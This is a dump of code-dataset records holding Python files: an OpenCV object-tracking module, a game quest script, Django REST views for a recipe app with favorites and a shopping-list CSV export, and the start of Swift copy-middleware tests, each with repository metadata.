    # Fix: plt.subplot() returns a single Axes and cannot be unpacked into
    # (fig, ax) -- the original raised TypeError here.  Use plt.subplots().
    fig_match, ax_match = plt.subplots()
    plt.imshow(img3)
    plt.show()
    plt.close(fig_match)
def crop_detection(img, detection):
    """Return the sub-image of *img* inside the detection's bounding box."""
    x1, y1, x2, y2, conf, cls_conf, cls_pred = detection
    top, bottom = int(y1), int(y2)
    left, right = int(x1), int(x2)
    return img[top:bottom, left:right]
def draw_detection(img, detection, ax):
    """Render *img* on *ax* with the detection's bounding box overlaid in red."""
    ax.imshow(myutils.bgr2rgb(img))
    x1, y1, x2, y2, conf, cls_conf, cls_pred = detection
    width, height = x2 - x1, y2 - y1
    rect = patches.Rectangle((x1, y1), width, height,
                             linewidth=2, edgecolor="red", facecolor="none")
    ax.add_patch(rect)
    # Hide the ticks -- the axes show an image, not a chart.
    ax.set_xticks([])
    ax.set_yticks([])
def tracking_by_detection(img_folder, image_paths, img_detections, size=(640, 480)):
    """Track objects across frames by matching detections in adjacent images.

    For each consecutive pair of frames, records the (old, new) detection
    index pairs returned by match_detections, then pickles the result to
    ``<img_folder>/output/tracks.pickle``.

    Returns a dict mapping each image path (from the second frame on) to its
    list of matched index pairs.
    """
    # Iterate through images and save plot of detections
    print("In Tracking By Detection")
    path_detections_zip = zip(image_paths, img_detections)
    num_images = len(image_paths)
    tqdm_pbar = tqdm.tqdm(path_detections_zip, total=num_images)
    tracks_dict = dict()
    for img_i, (path, detections) in enumerate(tqdm_pbar):
        tqdm_pbar.set_postfix({"Processing ": path})
        if img_i == 0:
            # The first frame has no predecessor to match against.
            print("Initialize Detections")
            continue
        # Match this frame's detections against the previous frame's.
        matching_pairs = match_detections(prev_path=image_paths[img_i - 1], prev_detection=img_detections[img_i - 1],
                                          new_path=path, new_detection=detections, size=size)
        print(matching_pairs)
        tracks_dict[path] = matching_pairs
    # Persist tracks plus the raw detections for later analysis.
    myutils.pickle_save(os.path.join(img_folder, "output/tracks.pickle"), (tracks_dict, img_detections))
    return tracks_dict
| 35.588608
| 119
| 0.676685
|
import tqdm
import cv2
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from matplotlib.ticker import NullLocator
from cs231aApproachingOdt import utils as myutils
from PIL import Image
import os
import torch
import torchvision.ops.boxes as bops
def match_detections(prev_path, prev_detection, new_path, new_detection, size=(640, 480)):
prev_range = [*range(len(prev_detection))]
new_range = [*range(len(new_detection))]
permutations = myutils.unique_permutations(prev_range, new_range)
fig, ax = plt.subplots(1, 2)
prev_img = myutils.load_resize(prev_path, size)
new_img = myutils.load_resize(new_path, size)
matching_pairs = []
for old, new in permutations:
[a.cla() for a in ax]
draw_detection(prev_img, prev_detection[old], ax[0])
ax[0].set_title(f"{os.path.basename(prev_path)}")
draw_detection(new_img, new_detection[new], ax[1])
ax[1].set_title(f"{os.path.basename(new_path)}")
iou = get_iou(prev_detection[old], new_detection[new])
if iou < 0.7:
continue
prev_crop = crop_detection(prev_img, prev_detection[old])
new_crop = crop_detection(new_img, new_detection[new])
methods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',
'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']
is_match = template_matching(new_crop, prev_crop, methods[3])
if is_match == True:
matching_pairs.append((old, new))
plt.close(fig)
return matching_pairs
def get_iou(prev_detection, new_detection):
box1 = new_detection[:4].reshape((1, 4))
box2 = prev_detection[:4].reshape((1, 4))
iou = bops.box_iou(box1, box2)
return iou
def template_matching(img1, template, method):
fig_template, ax = plt.subplots()
template_gray = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)
img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
img = img1_gray.copy()
w_t, h_t = template_gray.shape[::-1]
w_i, h_i = img1_gray.shape[::-1]
if (w_t > w_i) or (h_t > h_i):
return False
method = eval(method)
res = cv2.matchTemplate(img1_gray, template_gray, method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:
top_left = min_loc
else:
top_left = max_loc
if max_val > 0.9:
return True
else:
return False
def keypoint_matching(img1, img2):
img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
img2_gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
myutils.show(img1_gray)
orb = cv2.ORB_create()
kp1, des1 = orb.detectAndCompute(img1_gray, None)
kp2, des2 = orb.detectAndCompute(img2_gray, None)
bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
matches = bf.match(des1, des2)
matches = sorted(matches, key=lambda x: x.distance)
img3 = cv2.drawMatches(img1, kp1, img2, kp2, matches[:10], None, flags=cv2.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS)
fig_match, ax_match = plt.subplot()
plt.imshow(img3)
plt.show()
plt.close(fig_match)
def crop_detection(img, detection):
x1, y1, x2, y2, conf, cls_conf, cls_pred = detection
crop = img[int(y1):int(y2), int(x1):int(x2)]
return crop
def draw_detection(img, detection, ax):
ax.imshow(myutils.bgr2rgb(img))
x1, y1, x2, y2, conf, cls_conf, cls_pred = detection
box_w = x2 - x1
box_h = y2 - y1
bbox = patches.Rectangle((x1, y1), box_w, box_h, linewidth=2, edgecolor="red", facecolor="none")
ax.add_patch(bbox)
ax.set_xticks([])
ax.set_yticks([])
def tracking_by_detection(img_folder, image_paths, img_detections, size=(640, 480)):
print("In Tracking By Detection")
path_detections_zip = zip(image_paths, img_detections)
num_images = len(image_paths)
tqdm_pbar = tqdm.tqdm(path_detections_zip, total=num_images)
tracks_dict = dict()
for img_i, (path, detections) in enumerate(tqdm_pbar):
tqdm_pbar.set_postfix({"Processing ": path})
if img_i == 0:
print("Initialize Detections")
continue
matching_pairs = match_detections(prev_path=image_paths[img_i - 1], prev_detection=img_detections[img_i - 1],
new_path=path, new_detection=detections, size=size)
print(matching_pairs)
tracks_dict[path] = matching_pairs
myutils.pickle_save(os.path.join(img_folder, "output/tracks.pickle"), (tracks_dict, img_detections))
return tracks_dict
| true
| true
|
f705de5dde82e6bd54b2dfd92a538123dac03a9b
| 105
|
py
|
Python
|
scripts/quest/q5521e.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 54
|
2019-04-16T23:24:48.000Z
|
2021-12-18T11:41:50.000Z
|
scripts/quest/q5521e.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 3
|
2019-05-19T15:19:41.000Z
|
2020-04-27T16:29:16.000Z
|
scripts/quest/q5521e.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 49
|
2020-11-25T23:29:16.000Z
|
2022-03-26T16:20:24.000Z
|
# Tot's reward lv 40
# Quest-completion script: `sm` (the script manager) is injected by the host.
sm.completeQuest(5521)
# Lv. 40 Equipment box
sm.giveItem(2431877, 1)
# End the script / release the script manager.
sm.dispose()
| 15
| 23
| 0.72381
|
sm.completeQuest(5521)
# Lv. 40 Equipment box
sm.giveItem(2431877, 1)
sm.dispose()
| true
| true
|
f705de767d15e8ccdef551f1fa42f380207c8feb
| 11,462
|
py
|
Python
|
backend/api/views.py
|
vadikam100500/foodgram-project-react
|
11119e11d4919f72b3f104209102048ee38c366a
|
[
"PostgreSQL",
"MIT"
] | 1
|
2021-12-14T14:43:51.000Z
|
2021-12-14T14:43:51.000Z
|
backend/api/views.py
|
vadikam100500/foodgram-project-react
|
11119e11d4919f72b3f104209102048ee38c366a
|
[
"PostgreSQL",
"MIT"
] | null | null | null |
backend/api/views.py
|
vadikam100500/foodgram-project-react
|
11119e11d4919f72b3f104209102048ee38c366a
|
[
"PostgreSQL",
"MIT"
] | null | null | null |
import csv
from django.contrib.auth import get_user_model
from django.db.models.aggregates import Sum
from django.http.response import HttpResponse
from django.utils.decorators import method_decorator
from djoser.serializers import SetPasswordSerializer
from djoser.views import TokenCreateView
from drf_yasg.utils import swagger_auto_schema
from rest_framework import filters, status
from rest_framework.decorators import action
from rest_framework.generics import get_object_or_404
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet
from api import serializers
from api.decorators import multi_method_decorator
from api.docs.schemas import (EmptyAutoSchema, follower_params,
recipe_request_body)
from api.filters import GlobalFilterBackend
from api.pagination import FollowPagination, LimitPagination
from api.permissions import (IsAdminOrReadIfAuthenticatedObjPerm,
IsAdminOrReadOnly, RecipePermission)
from food.models import Ingredient, IngredientInRecipe, Recipe, Tag
from interactions.models import Favorite, Follow, Purchase
User = get_user_model()
class CustomTokenCreateView(TokenCreateView):
    """Token-create endpoint that reports 201 Created instead of djoser's default."""
    def _action(self, serializer):
        # Delegate to djoser, then override the status code on the way out.
        resp = super()._action(serializer)
        resp.status_code = status.HTTP_201_CREATED
        return resp
@multi_method_decorator(
    names=['update', 'partial_update', 'destroy'],
    decorator=swagger_auto_schema(auto_schema=None)
)
class CustomUserViewSet(ModelViewSet):
    """User CRUD plus profile, password and subscription endpoints."""
    queryset = User.objects.all().order_by('id')
    serializer_class = serializers.CustomUserSerializer
    pagination_class = LimitPagination
    permission_classes = (IsAdminOrReadIfAuthenticatedObjPerm,)
    def get_serializer_class(self):
        # Pick the serializer per action; default covers create/update.
        if self.action in ('list', 'retrieve', 'me'):
            return serializers.CustomUserGetSerializer
        elif self.action == 'set_password':
            return SetPasswordSerializer
        elif self.action == 'subscriptions':
            return serializers.SubscriptionsSerializer
        elif self.action == 'subscribe':
            return serializers.FollowSerializer
        return self.serializer_class
    @action(['get'], detail=False,
            permission_classes=(IsAuthenticated,))
    @swagger_auto_schema(auto_schema=EmptyAutoSchema)
    def me(self, request, pk=None):
        """Return the authenticated user's own profile."""
        serializer = self.get_serializer(self.request.user)
        return Response(serializer.data, status=status.HTTP_200_OK)
    @action(['post'], detail=False, permission_classes=(IsAuthenticated,))
    @swagger_auto_schema(request_body=SetPasswordSerializer,
                         responses={204: 'No Content'})
    def set_password(self, request, *args, **kwargs):
        """Change the authenticated user's password."""
        serializer = self.get_serializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        self.request.user.set_password(
            serializer.validated_data['new_password']
        )
        self.request.user.save()
        return Response(status=status.HTTP_204_NO_CONTENT)
    @action(['get'], detail=False, pagination_class=FollowPagination,
            permission_classes=[IsAuthenticated])
    @swagger_auto_schema(responses={201: serializers.SubscriptionsSerializer})
    def subscriptions(self, request):
        """List the authors the current user follows (paginated)."""
        queryset = Follow.objects.filter(user=request.user)
        if not queryset.exists():
            return Response({'error': 'Вы еще ни на кого не подписаны'},
                            status=status.HTTP_400_BAD_REQUEST)
        page = self.paginate_queryset(queryset)
        # Fix: DRF's paginate_queryset returns None when pagination is
        # disabled; a truthiness test (`if page:`) would also skip the
        # paginated response for an empty page list.
        if page is not None:
            serializer = self.get_serializer(
                page,
                many=True,
                context={'request': request}
            )
            return self.get_paginated_response(serializer.data)
        serializer = self.get_serializer(queryset, many=True,
                                         context={'request': request})
        return Response(serializer.data)
    @action(['get'], detail=True, permission_classes=[IsAuthenticated])
    @swagger_auto_schema(manual_parameters=follower_params,
                         responses={201: serializers.SubscriptionsSerializer})
    def subscribe(self, request, pk=None):
        """Subscribe the current user to the user with id *pk*."""
        user, author = self.following_validate(request, pk)
        if not author:
            # `user` carries the error message in this case.
            return Response({'error': user},
                            status=status.HTTP_400_BAD_REQUEST)
        data = {'user': user.id, 'author': author.id}
        serializer = self.get_serializer(
            data=data, context={'request': request}
        )
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_201_CREATED)
    @subscribe.mapping.delete
    def delete_subscribe(self, request, pk=None):
        """Unsubscribe the current user from the user with id *pk*."""
        user, author, subscribe = self.following_validate(request, pk,
                                                          delete=True)
        if not author or not subscribe:
            return Response({'error': user},
                            status=status.HTTP_400_BAD_REQUEST)
        subscribe.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
    def following_validate(self, request, pk, delete=False):
        """Validate a (un)subscribe request.

        Returns (user, author) on success, or — with delete=True —
        (user, author, follow_obj).  On failure the first element is an
        error message and the remaining element(s) are falsy.
        """
        user = request.user
        if not User.objects.filter(id=pk).exists():
            if delete:
                return 'Такого пользователя еще нет', False, False
            return 'Такого пользователя еще нет', False
        author = get_object_or_404(User, id=pk)
        if delete:
            if not Follow.objects.filter(user=user, author=author).exists():
                return ('У вас еще нет этого пользователя в подписках',
                        True, False)
            else:
                return (user, author,
                        get_object_or_404(Follow, user=user,
                                          author=author))
        return user, author
# Hide the write actions from the generated API docs; permissions still
# restrict writes to admins.
@multi_method_decorator(
    names=['create', 'update', 'partial_update', 'destroy'],
    decorator=swagger_auto_schema(auto_schema=None)
)
class TagViewSet(ModelViewSet):
    """Read-mostly CRUD for recipe tags (writes are admin-only)."""
    queryset = Tag.objects.all()
    serializer_class = serializers.TagSerializer
    permission_classes = (IsAdminOrReadOnly,)
# Hide the write actions from the generated API docs; permissions still
# restrict writes to admins.
@multi_method_decorator(
    names=['create', 'update', 'partial_update', 'destroy'],
    decorator=swagger_auto_schema(auto_schema=None)
)
class IngredientsViewSet(ModelViewSet):
    """Read-mostly CRUD for ingredients with name search (?search=...)."""
    queryset = Ingredient.objects.all()
    serializer_class = serializers.IngredientSerializer
    permission_classes = (IsAdminOrReadOnly,)
    filter_backends = (filters.SearchFilter,)
    search_fields = ('name', )
@method_decorator(
    swagger_auto_schema(
        request_body=recipe_request_body,
        responses={201: serializers.RecipeSerializer}
    ),
    name='create'
)
@method_decorator(
    swagger_auto_schema(
        request_body=recipe_request_body,
        responses={200: serializers.RecipeSerializer}
    ),
    name='update'
)
@method_decorator(
    swagger_auto_schema(auto_schema=None),
    name='partial_update'
)
class RecipeViewSet(ModelViewSet):
    """Recipe CRUD plus favorites, shopping cart and cart download."""
    queryset = Recipe.objects.all()
    serializer_class = serializers.RecipeSerializer
    pagination_class = LimitPagination
    permission_classes = (RecipePermission,)
    filter_backends = (GlobalFilterBackend,)
    filterset_fields = ('author', )
    def get_serializer_class(self):
        # The favorite / shopping-cart actions use their own serializers.
        if self.action == 'favorite':
            return serializers.FavoriteSerializer
        elif self.action == 'shopping_cart':
            return serializers.PurchaseSerializer
        return self.serializer_class
    @action(['get'], detail=True, permission_classes=[IsAuthenticated])
    @swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer})
    def favorite(self, request, pk=None):
        """Add recipe *pk* to the current user's favorites."""
        return self.alt_endpoint_create(request, pk)
    @favorite.mapping.delete
    def delete_favorite(self, request, pk=None):
        """Remove recipe *pk* from the current user's favorites."""
        return self.alt_endpoint_delete(request, pk, favorite=True)
    @action(['get'], detail=True, permission_classes=[IsAuthenticated])
    @swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer})
    def shopping_cart(self, request, pk=None):
        """Add recipe *pk* to the current user's shopping cart."""
        return self.alt_endpoint_create(request, pk)
    @shopping_cart.mapping.delete
    def delete_shopping_cart(self, request, pk=None):
        """Remove recipe *pk* from the current user's shopping cart."""
        return self.alt_endpoint_delete(request, pk, cart=True)
    @action(['get'], detail=False, permission_classes=(IsAuthenticated,))
    @swagger_auto_schema(auto_schema=EmptyAutoSchema,
                         responses={200: 'Download', 401: 'NotAuthorized'})
    def download_shopping_cart(self, request):
        """Stream the user's aggregated shopping list as a CSV attachment."""
        # Sum the amount of each ingredient across all recipes in the cart.
        ingredients = (
            IngredientInRecipe.objects
            .select_related('ingredient', 'recipe')
            .prefetch_related('purchases')
            .filter(recipe__purchases__user=request.user)
            .values_list('ingredient__name', 'ingredient__measurement_unit')
            .annotate(amount=Sum('amount'))
        )
        response = HttpResponse(content_type='text/csv')
        response['Content-Disposition'] = ('attachment;'
                                           'filename="Your_shopping_list.csv"')
        writer = csv.writer(response)
        writer.writerow(['Ингредиент', 'Единица измерения', 'Количество'])
        for ingredient in ingredients:
            writer.writerow(ingredient)
        return response
    def alt_endpoint_create(self, request, pk):
        """Shared create path for the favorite / shopping_cart actions."""
        verdict, recipe, user = self.recipe_validate(request, pk)
        if not verdict:
            # `recipe` is the error Response in this case.
            return recipe
        data = {
            'user': user.id,
            'recipe': recipe.id,
        }
        serializer = self.get_serializer(data=data,
                                         context={'request': request})
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_201_CREATED)
    def alt_endpoint_delete(self, request, pk, favorite=False, cart=False):
        """Shared delete path for the favorite / shopping_cart actions."""
        verdict, obj = self.recipe_validate(request, pk, delete=True,
                                            favorite=favorite, cart=cart)
        if not verdict:
            # `obj` is the error Response in this case.
            return obj
        obj.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
    def recipe_validate(self, request, pk, delete=False,
                        favorite=False, cart=False):
        """Validate a favorite/cart request against recipe *pk*.

        Returns (True, recipe, user) for creates, (True, obj) for deletes,
        or (False, error_response[, None]) on failure.  Exactly one of
        *favorite* / *cart* must be True when *delete* is True.
        """
        user = request.user
        if not Recipe.objects.filter(id=pk).exists():
            response = Response({'error': 'Такого рецепта еще нет'},
                                status=status.HTTP_400_BAD_REQUEST)
            # Fix: alt_endpoint_delete unpacks two values, but this branch
            # previously returned a 3-tuple even when delete=True, raising
            # ValueError on deleting a nonexistent recipe.
            if delete:
                return False, response
            return False, response, None
        recipe = get_object_or_404(Recipe, id=pk)
        if delete:
            model_answer = {
                'favorite': (Favorite, 'избранном'),
                'cart': (Purchase, 'списке покупок')
            }
            if favorite:
                model, answer = model_answer.get('favorite')
            if cart:
                model, answer = model_answer.get('cart')
            if not model.objects.filter(user=user, recipe=recipe).exists():
                return False, Response(
                    {'error': f'Такого рецепта еще нет в вашем {answer}'},
                    status=status.HTTP_400_BAD_REQUEST
                )
            return True, get_object_or_404(model, user=user, recipe=recipe)
        return True, recipe, user
| 39.119454
| 79
| 0.655819
|
import csv
from django.contrib.auth import get_user_model
from django.db.models.aggregates import Sum
from django.http.response import HttpResponse
from django.utils.decorators import method_decorator
from djoser.serializers import SetPasswordSerializer
from djoser.views import TokenCreateView
from drf_yasg.utils import swagger_auto_schema
from rest_framework import filters, status
from rest_framework.decorators import action
from rest_framework.generics import get_object_or_404
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet
from api import serializers
from api.decorators import multi_method_decorator
from api.docs.schemas import (EmptyAutoSchema, follower_params,
recipe_request_body)
from api.filters import GlobalFilterBackend
from api.pagination import FollowPagination, LimitPagination
from api.permissions import (IsAdminOrReadIfAuthenticatedObjPerm,
IsAdminOrReadOnly, RecipePermission)
from food.models import Ingredient, IngredientInRecipe, Recipe, Tag
from interactions.models import Favorite, Follow, Purchase
User = get_user_model()
class CustomTokenCreateView(TokenCreateView):
def _action(self, serializer):
response = super()._action(serializer)
response.status_code = status.HTTP_201_CREATED
return response
@multi_method_decorator(
names=['update', 'partial_update', 'destroy'],
decorator=swagger_auto_schema(auto_schema=None)
)
class CustomUserViewSet(ModelViewSet):
queryset = User.objects.all().order_by('id')
serializer_class = serializers.CustomUserSerializer
pagination_class = LimitPagination
permission_classes = (IsAdminOrReadIfAuthenticatedObjPerm,)
def get_serializer_class(self):
if self.action in ('list', 'retrieve', 'me'):
return serializers.CustomUserGetSerializer
elif self.action == 'set_password':
return SetPasswordSerializer
elif self.action == 'subscriptions':
return serializers.SubscriptionsSerializer
elif self.action == 'subscribe':
return serializers.FollowSerializer
return self.serializer_class
@action(['get'], detail=False,
permission_classes=(IsAuthenticated,))
@swagger_auto_schema(auto_schema=EmptyAutoSchema)
def me(self, request, pk=None):
serializer = self.get_serializer(self.request.user)
return Response(serializer.data, status=status.HTTP_200_OK)
@action(['post'], detail=False, permission_classes=(IsAuthenticated,))
@swagger_auto_schema(request_body=SetPasswordSerializer,
responses={204: 'No Content'})
def set_password(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.request.user.set_password(
serializer.validated_data['new_password']
)
self.request.user.save()
return Response(status=status.HTTP_204_NO_CONTENT)
@action(['get'], detail=False, pagination_class=FollowPagination,
permission_classes=[IsAuthenticated])
@swagger_auto_schema(responses={201: serializers.SubscriptionsSerializer})
def subscriptions(self, request):
queryset = Follow.objects.filter(user=request.user)
if not queryset.exists():
return Response({'error': 'Вы еще ни на кого не подписаны'},
status=status.HTTP_400_BAD_REQUEST)
page = self.paginate_queryset(queryset)
if page:
serializer = self.get_serializer(
page,
many=True,
context={'request': request}
)
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(queryset, many=True,
context={'request': request})
return Response(serializer.data)
@action(['get'], detail=True, permission_classes=[IsAuthenticated])
@swagger_auto_schema(manual_parameters=follower_params,
responses={201: serializers.SubscriptionsSerializer})
def subscribe(self, request, pk=None):
user, author = self.following_validate(request, pk)
if not author:
return Response({'error': user},
status=status.HTTP_400_BAD_REQUEST)
data = {'user': user.id, 'author': author.id}
serializer = self.get_serializer(
data=data, context={'request': request}
)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
@subscribe.mapping.delete
def delete_subscribe(self, request, pk=None):
user, author, subscribe = self.following_validate(request, pk,
delete=True)
if not author or not subscribe:
return Response({'error': user},
status=status.HTTP_400_BAD_REQUEST)
subscribe.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
def following_validate(self, request, pk, delete=False):
user = request.user
if not User.objects.filter(id=pk).exists():
if delete:
return 'Такого пользователя еще нет', False, False
return 'Такого пользователя еще нет', False
author = get_object_or_404(User, id=pk)
if delete:
if not Follow.objects.filter(user=user, author=author).exists():
return ('У вас еще нет этого пользователя в подписках',
True, False)
else:
return (user, author,
get_object_or_404(Follow, user=user,
author=author))
return user, author
@multi_method_decorator(
names=['create', 'update', 'partial_update', 'destroy'],
decorator=swagger_auto_schema(auto_schema=None)
)
class TagViewSet(ModelViewSet):
queryset = Tag.objects.all()
serializer_class = serializers.TagSerializer
permission_classes = (IsAdminOrReadOnly,)
@multi_method_decorator(
names=['create', 'update', 'partial_update', 'destroy'],
decorator=swagger_auto_schema(auto_schema=None)
)
class IngredientsViewSet(ModelViewSet):
queryset = Ingredient.objects.all()
serializer_class = serializers.IngredientSerializer
permission_classes = (IsAdminOrReadOnly,)
filter_backends = (filters.SearchFilter,)
search_fields = ('name', )
@method_decorator(
    swagger_auto_schema(
        request_body=recipe_request_body,
        responses={201: serializers.RecipeSerializer}
    ),
    name='create'
)
@method_decorator(
    swagger_auto_schema(
        request_body=recipe_request_body,
        responses={200: serializers.RecipeSerializer}
    ),
    name='update'
)
@method_decorator(
    swagger_auto_schema(auto_schema=None),
    name='partial_update'
)
class RecipeViewSet(ModelViewSet):
    """CRUD for recipes plus favorite / shopping-cart extra endpoints."""

    queryset = Recipe.objects.all()
    serializer_class = serializers.RecipeSerializer
    pagination_class = LimitPagination
    permission_classes = (RecipePermission,)
    filter_backends = (GlobalFilterBackend,)
    filterset_fields = ('author', )

    def get_serializer_class(self):
        """Pick the serializer matching the current extra action."""
        if self.action == 'favorite':
            return serializers.FavoriteSerializer
        if self.action == 'shopping_cart':
            return serializers.PurchaseSerializer
        return self.serializer_class

    @action(['get'], detail=True, permission_classes=[IsAuthenticated])
    @swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer})
    def favorite(self, request, pk=None):
        """Add recipe ``pk`` to the current user's favorites."""
        return self.alt_endpoint_create(request, pk)

    @favorite.mapping.delete
    def delete_favorite(self, request, pk=None):
        """Remove recipe ``pk`` from the current user's favorites."""
        return self.alt_endpoint_delete(request, pk, favorite=True)

    @action(['get'], detail=True, permission_classes=[IsAuthenticated])
    @swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer})
    def shopping_cart(self, request, pk=None):
        """Add recipe ``pk`` to the current user's shopping cart."""
        return self.alt_endpoint_create(request, pk)

    @shopping_cart.mapping.delete
    def delete_shopping_cart(self, request, pk=None):
        """Remove recipe ``pk`` from the current user's shopping cart."""
        return self.alt_endpoint_delete(request, pk, cart=True)

    @action(['get'], detail=False, permission_classes=(IsAuthenticated,))
    @swagger_auto_schema(auto_schema=EmptyAutoSchema,
                         responses={200: 'Download', 401: 'NotAuthorized'})
    def download_shopping_cart(self, request):
        """Stream the user's aggregated shopping list as a CSV attachment."""
        ingredients = (
            IngredientInRecipe.objects
            .select_related('ingredient', 'recipe')
            .prefetch_related('purchases')
            .filter(recipe__purchases__user=request.user)
            .values_list('ingredient__name', 'ingredient__measurement_unit')
            .annotate(amount=Sum('amount'))
        )
        response = HttpResponse(content_type='text/csv')
        response['Content-Disposition'] = ('attachment;'
                                           'filename="Your_shopping_list.csv"')
        writer = csv.writer(response)
        writer.writerow(['Ингредиент', 'Единица измерения', 'Количество'])
        writer.writerows(ingredients)
        return response

    def alt_endpoint_create(self, request, pk):
        """Shared create handler for ``favorite`` and ``shopping_cart``."""
        verdict, recipe, user = self.recipe_validate(request, pk)
        if not verdict:
            # ``recipe`` is the error Response built by recipe_validate.
            return recipe
        data = {
            'user': user.id,
            'recipe': recipe.id,
        }
        serializer = self.get_serializer(data=data,
                                         context={'request': request})
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_201_CREATED)

    def alt_endpoint_delete(self, request, pk, favorite=False, cart=False):
        """Shared delete handler for the favorite / cart delete mappings."""
        verdict, obj = self.recipe_validate(request, pk, delete=True,
                                            favorite=favorite, cart=cart)
        if not verdict:
            # ``obj`` is the error Response built by recipe_validate.
            return obj
        obj.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)

    def recipe_validate(self, request, pk, delete=False,
                        favorite=False, cart=False):
        """Validate recipe ``pk`` for the favorite / cart endpoints.

        Returns (True, recipe, user) or (False, Response, None) when
        ``delete`` is falsy, and (True, relation_obj) or
        (False, Response) when ``delete`` is true.
        """
        user = request.user
        if not Recipe.objects.filter(id=pk).exists():
            error = Response({'error': 'Такого рецепта еще нет'},
                             status=status.HTTP_400_BAD_REQUEST)
            # Bug fix: this branch used to return a 3-tuple
            # unconditionally, which broke the 2-value unpacking in
            # alt_endpoint_delete (ValueError on a missing recipe id).
            if delete:
                return False, error
            return False, error, None
        recipe = get_object_or_404(Recipe, id=pk)
        if not delete:
            return True, recipe, user
        # ``cart`` takes priority, matching the original assignment
        # order; defaulting to Favorite also guards against the
        # previously possible unbound ``model`` when neither flag is set.
        if cart:
            model, answer = Purchase, 'списке покупок'
        else:
            model, answer = Favorite, 'избранном'
        if not model.objects.filter(user=user, recipe=recipe).exists():
            return False, Response(
                {'error': f'Такого рецепта еще нет в вашем {answer}'},
                status=status.HTTP_400_BAD_REQUEST
            )
        return True, get_object_or_404(model, user=user, recipe=recipe)
| true
| true
|
f705de9ae40aeb7ac96605765acb1cf9903cb9e3
| 70,522
|
py
|
Python
|
test/unit/common/middleware/test_copy.py
|
gyaozhou/swift-read
|
16fe18ae3be59a095f3bafdd69fe74b48a2771cb
|
[
"Apache-2.0"
] | null | null | null |
test/unit/common/middleware/test_copy.py
|
gyaozhou/swift-read
|
16fe18ae3be59a095f3bafdd69fe74b48a2771cb
|
[
"Apache-2.0"
] | null | null | null |
test/unit/common/middleware/test_copy.py
|
gyaozhou/swift-read
|
16fe18ae3be59a095f3bafdd69fe74b48a2771cb
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import unittest
from hashlib import md5
from six.moves import urllib
from swift.common import swob
from swift.common.middleware import copy
from swift.common.storage_policy import POLICIES
from swift.common.swob import Request, HTTPException
from swift.common.utils import closing_if_possible
from test.unit import patch_policies, debug_logger, FakeMemcache, FakeRing
from test.unit.common.middleware.helpers import FakeSwift
from test.unit.proxy.controllers.test_obj import set_http_connect, \
PatchedObjControllerApp
class TestCopyConstraints(unittest.TestCase):
    """Unit tests for the copy middleware's source/destination parsers."""

    def test_validate_copy_from(self):
        """Well-formed X-Copy-From values parse to (container, object)."""
        cases = [
            ('c/o2', 'c', 'o2'),
            ('c/subdir/o2', 'c', 'subdir/o2'),
            ('/c/o2', 'c', 'o2'),
        ]
        for header_val, want_cont, want_obj in cases:
            req = Request.blank(
                '/v/a/c/o',
                headers={'x-copy-from': header_val})
            src_cont, src_obj = copy._check_copy_from_header(req)
            self.assertEqual(src_cont, want_cont)
            self.assertEqual(src_obj, want_obj)

    def test_validate_bad_copy_from(self):
        """A source with no container/object separator is rejected."""
        req = Request.blank(
            '/v/a/c/o',
            headers={'x-copy-from': 'bad_object'})
        self.assertRaises(HTTPException,
                          copy._check_copy_from_header, req)

    def test_validate_destination(self):
        """Well-formed Destination values parse to (container, object)."""
        cases = [
            ('c/o2', 'c', 'o2'),
            ('c/subdir/o2', 'c', 'subdir/o2'),
            ('/c/o2', 'c', 'o2'),
        ]
        for header_val, want_cont, want_obj in cases:
            req = Request.blank(
                '/v/a/c/o',
                headers={'destination': header_val})
            src_cont, src_obj = copy._check_destination_header(req)
            self.assertEqual(src_cont, want_cont)
            self.assertEqual(src_obj, want_obj)

    def test_validate_bad_destination(self):
        """A destination with no container/object separator is rejected."""
        req = Request.blank(
            '/v/a/c/o',
            headers={'destination': 'bad_object'})
